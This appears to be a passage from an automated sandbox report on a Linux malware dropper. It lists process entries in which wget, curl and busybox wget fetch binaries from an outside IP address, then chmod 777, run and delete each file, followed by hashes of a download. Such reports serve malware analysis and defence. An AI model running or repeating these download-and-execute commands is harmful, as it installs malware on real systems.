/tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I62⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:950
-
-
/bin/chmodchmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:956
-
-
/bin/chmodchmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX12⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:962
-
-
/bin/chmodchmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M2⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:968
-
-
/bin/chmodchmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub2⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:974
-
-
/bin/chmodchmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR52⤵PID:977
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:978
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:979
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:980
-
-
/bin/chmodchmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT2⤵PID:983
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97